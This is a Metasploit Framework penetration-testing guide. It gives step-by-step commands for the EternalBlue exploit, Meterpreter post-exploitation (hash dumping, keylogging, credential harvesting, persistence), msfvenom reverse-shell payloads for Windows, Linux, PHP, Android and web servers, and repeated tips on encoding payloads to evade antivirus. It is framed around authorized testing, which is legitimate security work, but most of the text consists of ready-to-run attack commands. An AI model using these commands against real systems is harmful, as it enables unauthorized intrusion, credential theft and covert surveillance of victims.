Metasploit Framework

Purpose

Leverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation activities. Metasploit provides a unified platform for vulnerability exploitation, payload generation, auxiliary scanning, and maintaining access to compromised systems during authorized security assessments.

Prerequisites

Required Tools

# Metasploit comes pre-installed on Kali Linux
For other systems:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
Start PostgreSQL for database support

sudo systemctl start postgresql
sudo msfdb init

Required Knowledge

Network and system fundamentals

Understanding of vulnerabilities and exploits

Basic programming concepts

Target enumeration techniques

Required Access

Written authorization for testing

Network access to target systems

Understanding of scope and rules of engagement

Outputs and Deliverables

Exploitation Evidence - Screenshots and logs of successful compromises

Session Logs - Command history and extracted data

Vulnerability Mapping - Exploited vulnerabilities with CVE references

Post-Exploitation Artifacts - Credentials, files, and system information

Core Workflow

Phase 1: MSFConsole Basics

Launch and navigate the Metasploit console:

# Start msfconsole
msfconsole
Quiet mode (skip banner)

msfconsole -q
Basic navigation commands

msf6 > help                    # Show all commands
msf6 > search [term]           # Search modules
msf6 > use [module]            # Select module
msf6 > info                    # Show module details
msf6 > show options            # Display required options
msf6 > set [OPTION] [value]    # Configure option
msf6 > run / exploit           # Execute module
msf6 > back                    # Return to main console
msf6 > exit                    # Exit msfconsole

Phase 2: Module Types

Understand the different module categories:

# 1. Exploit Modules - Target specific vulnerabilities
msf6 > show exploits
msf6 > use exploit/windows/smb/ms17_010_eternalblue
2. Payload Modules - Code executed after exploitation

msf6 > show payloads
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
3. Auxiliary Modules - Scanning, fuzzing, enumeration

msf6 > show auxiliary
msf6 > use auxiliary/scanner/smb/smb_version
4. Post-Exploitation Modules - Actions after compromise

msf6 > show post
msf6 > use post/windows/gather/hashdump
5. Encoders - Obfuscate payloads

msf6 > show encoders
msf6 > set ENCODER x86/shikata_ga_nai
6. Nops - No-operation padding for buffer overflows

msf6 > show nops
7. Evasion - Bypass security controls

msf6 > show evasion

Phase 3: Searching for Modules

Find appropriate modules for targets:

# Search by name
msf6 > search eternalblue
Search by CVE

msf6 > search cve:2017-0144
Search by platform

msf6 > search platform:windows type:exploit
Search by type and keyword

msf6 > search type:auxiliary smb
Filter by rank (excellent, great, good, normal, average, low, manual)

msf6 > search rank:excellent
Combined search

msf6 > search type:exploit platform:linux apache
View search results columns:

Name, Disclosure Date, Rank, Check (if it can verify vulnerability), Description

Phase 4: Configuring Exploits

Set up an exploit for execution:

# Select exploit module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
View required options

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Set target host

msf6 exploit(...) > set RHOSTS 192.168.1.100
Set target port (if different from default)

msf6 exploit(...) > set RPORT 445
View compatible payloads

msf6 exploit(...) > show payloads
Set payload

msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
Set local host for reverse connection

msf6 exploit(...) > set LHOST 192.168.1.50
msf6 exploit(...) > set LPORT 4444
View all options again to verify

msf6 exploit(...) > show options
Check if target is vulnerable (if supported)

msf6 exploit(...) > check
Execute exploit

msf6 exploit(...) > exploit
or

msf6 exploit(...) > run

Phase 5: Payload Types

Select appropriate payload for the situation:

# Singles - Self-contained, no staging
windows/shell_reverse_tcp
linux/x86/shell_bind_tcp
Stagers - Small payload that downloads larger stage

windows/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
Stages - Downloaded by stager, provides full functionality

Meterpreter, VNC, shell
Payload naming convention:

[platform]/[architecture]/[payload_type]/[connection_type]

Examples:

windows/x64/meterpreter/reverse_tcp
linux/x86/shell/bind_tcp
php/meterpreter/reverse_tcp
java/meterpreter/reverse_https
android/meterpreter/reverse_tcp

Phase 6: Meterpreter Session

Work with Meterpreter post-exploitation:

# After successful exploitation, you get Meterpreter prompt
meterpreter >
System Information

meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
File System Operations

meterpreter > pwd
meterpreter > ls
meterpreter > cd C:\\Users
meterpreter > download file.txt /tmp/
meterpreter > upload /tmp/tool.exe C:\\
Process Management

meterpreter > ps
meterpreter > migrate [PID]
meterpreter > kill [PID]
Networking

meterpreter > ipconfig
meterpreter > netstat
meterpreter > route
meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1
Privilege Escalation

meterpreter > getsystem
meterpreter > getprivs
Credential Harvesting

meterpreter > hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
Screenshots and Keylogging

meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
Shell Access

meterpreter > shell
C:\Windows\system32> whoami
C:\Windows\system32> exit
meterpreter >
Background Session

meterpreter > background
msf6 exploit(...) > sessions -l
msf6 exploit(...) > sessions -i 1

Phase 7: Auxiliary Modules

Use auxiliary modules for reconnaissance:

# SMB Version Scanner
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(...) > run
Port Scanner

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > set PORTS 1-1000
msf6 auxiliary(...) > run
SSH Version Scanner

msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(...) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(...) > run
FTP Anonymous Login

msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > run
HTTP Directory Scanner

msf6 > use auxiliary/scanner/http/dir_scanner
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > run
Brute Force Modules

msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > set USER_FILE /usr/share/wordlists/users.txt
msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(...) > run

Phase 8: Post-Exploitation Modules

Run post modules on active sessions:

# List sessions
msf6 > sessions -l
Run post module on specific session

msf6 > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set SESSION 1
msf6 post(...) > run
Or run directly from Meterpreter

meterpreter > run post/windows/gather/hashdump
Common Post Modules

Credential Gathering

post/windows/gather/credentials/credential_collector
post/windows/gather/lsa_secrets
post/windows/gather/cachedump
post/multi/gather/ssh_creds
System Enumeration

post/windows/gather/enum_applications
post/windows/gather/enum_logged_on_users
post/windows/gather/enum_shares
post/linux/gather/enum_configs
Privilege Escalation

post/windows/escalate/getsystem
post/multi/recon/local_exploit_suggester
Persistence

post/windows/manage/persistence_exe
post/linux/manage/sshkey_persistence
Pivoting

post/multi/manage/autoroute

Phase 9: Payload Generation with msfvenom

Create standalone payloads:

# Basic Windows reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe
Linux reverse shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf
PHP reverse shell

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php
Python reverse shell

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py
PowerShell payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1
ASP web shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp
WAR file (Tomcat)

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war
Android APK

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk
Encoded payload (evade AV)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe
List available formats

msfvenom --list formats
List available encoders

msfvenom --list encoders

Phase 10: Setting Up Handlers

Configure listener for incoming connections:

# Manual handler setup
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.50
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j
The -j flag runs as background job

msf6 > jobs -l
When payload executes on target, session opens

[*] Meterpreter session 1 opened
Interact with session

msf6 > sessions -i 1

Quick Reference

Essential MSFConsole Commands

Command	Description
`search [term]`	Search for modules
`use [module]`	Select a module
`info`	Display module information
`show options`	Show configurable options
`set [OPT] [val]`	Set option value
`setg [OPT] [val]`	Set global option
`run` / `exploit`	Execute module
`check`	Verify target vulnerability
`back`	Deselect module
`sessions -l`	List active sessions
`sessions -i [N]`	Interact with session
`jobs -l`	List background jobs
`db_nmap`	Run nmap with database

Meterpreter Essential Commands

Command	Description
`sysinfo`	System information
`getuid`	Current user
`getsystem`	Attempt privilege escalation
`hashdump`	Dump password hashes
`shell`	Drop to system shell
`upload/download`	File transfer
`screenshot`	Capture screen
`keyscan_start`	Start keylogger
`migrate [PID]`	Move to another process
`background`	Background session
`portfwd`	Port forwarding

Common Exploit Modules

# Windows
exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/ms08_067_netapi
exploit/windows/http/iis_webdav_upload_asp
exploit/windows/local/bypassuac
Linux

exploit/linux/ssh/sshexec
exploit/linux/local/overlayfs_priv_esc
exploit/multi/http/apache_mod_cgi_bash_env_exec
Web Applications

exploit/multi/http/tomcat_mgr_upload
exploit/unix/webapp/wp_admin_shell_upload
exploit/multi/http/jenkins_script_console

Constraints and Limitations

Legal Requirements

Only use on systems you own or have written authorization to test

Document all testing activities

Follow rules of engagement

Report all findings to appropriate parties

Technical Limitations

Modern AV/EDR may detect Metasploit payloads

Some exploits require specific target configurations

Firewall rules may block reverse connections

Not all exploits work on all target versions

Operational Security

Use encrypted channels (reverse_https) when possible

Clean up artifacts after testing

Avoid detection by monitoring systems

Limit post-exploitation to agreed scope

Troubleshooting

Issue	Solutions
Database not connected	Run `sudo msfdb init`, start PostgreSQL, then `db_connect`
Exploit fails/no session	Run `check`; verify payload architecture; check firewall; try different payloads
Session dies immediately	Migrate to stable process; use stageless payload; check AV; use AutoRunScript
Payload detected by AV	Use encoding `-e x86/shikata_ga_nai -i 10`; use evasion modules; custom templates